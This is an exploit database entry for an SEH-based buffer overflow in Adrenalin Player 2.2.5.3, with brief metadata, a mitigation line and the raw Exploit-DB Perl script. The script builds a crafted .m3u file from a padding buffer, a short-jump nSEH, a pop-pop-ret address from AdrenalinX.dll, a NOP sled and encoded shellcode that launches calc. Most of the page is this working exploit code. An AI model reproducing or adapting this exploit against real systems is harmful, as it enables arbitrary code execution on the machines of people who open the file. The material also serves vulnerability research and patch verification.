Adrenalin Player 2.2.5.3 Buffer Overflow Exploit(SEH)

vendor:

Adrenalin Player

by:

seaofglass

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Adrenalin Player

Affected Version From: 2.2.5.3

Affected Version To: 2.2.5.3

Patch Exists: Yes

Related CWE: N/A

CPE: MFS_100099

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXP3 KOR, Win7 KOR

Unknown

Adrenalin Player 2.2.5.3 Buffer Overflow Exploit(SEH)

Adrenalin Player 2.2.5.3 is vulnerable to a buffer overflow exploit. The vulnerability is triggered when a specially crafted .m3u file is opened. The exploit code contains a NOP sled followed by a shellcode that spawns a calculator. The exploit code is written in assembly language and is designed to overwrite the SEH (Structured Exception Handler) record.

Mitigation:

Update to the latest version of Adrenalin Player.

Source

Exploit-DB raw data:

# Exploit Title: Adrenalin Player 2.2.5.3 Buffer Overflow Exploit(SEH)
# http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Author: seaofglass (seaofglass@korea.com)
# Version : 2.2.5.3
# Tested on: WinXP3 KOR, Win7 KOR

my $file = "adrenalin.m3u";
my $junk = "\x90" x 2172;
my $nseh = pack('V', 0x909006EB);
my $seh = pack('V', 0x1016f313); #ppr from AdrenalinX.dll
my $nop = "\x90" x 16;
my $calc =
"\xba\x38\xdc\x15\x77\xdd\xc7\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x33\x83\xc5\x04\x31\x55\x0e\x03\x6d\xd2\xf7\x82\x71" .
"\x02\x7e\x6c\x89\xd3\xe1\xe4\x6c\xe2\x33\x92\xe5\x57\x84" .
"\xd0\xab\x5b\x6f\xb4\x5f\xef\x1d\x11\x50\x58\xab\x47\x5f" .
"\x59\x1d\x48\x33\x99\x3f\x34\x49\xce\x9f\x05\x82\x03\xe1" .
"\x42\xfe\xec\xb3\x1b\x75\x5e\x24\x2f\xcb\x63\x45\xff\x40" .
"\xdb\x3d\x7a\x96\xa8\xf7\x85\xc6\x01\x83\xce\xfe\x2a\xcb" .
"\xee\xff\xff\x0f\xd2\xb6\x74\xfb\xa0\x49\x5d\x35\x48\x78" .
"\xa1\x9a\x77\xb5\x2c\xe2\xb0\x71\xcf\x91\xca\x82\x72\xa2" .
"\x08\xf9\xa8\x27\x8d\x59\x3a\x9f\x75\x58\xef\x46\xfd\x56" .
"\x44\x0c\x59\x7a\x5b\xc1\xd1\x86\xd0\xe4\x35\x0f\xa2\xc2" .
"\x91\x54\x70\x6a\x83\x30\xd7\x93\xd3\x9c\x88\x31\x9f\x0e" .
"\xdc\x40\xc2\x44\x23\xc0\x78\x21\x23\xda\x82\x01\x4c\xeb" .
"\x09\xce\x0b\xf4\xdb\xab\xe4\xbe\x46\x9d\x6c\x67\x13\x9c" .
"\xf0\x98\xc9\xe2\x0c\x1b\xf8\x9a\xea\x03\x89\x9f\xb7\x83" .
"\x61\xed\xa8\x61\x86\x42\xc8\xa3\xe5\x05\x5a\x2f\xc4\xa0" .
"\xda\xca\x18";

open($FILE, ">$file");
print $FILE $junk . $nseh . $seh . $nop . $calc;
close($FILE);

print "m3u poc file created successfully.\n";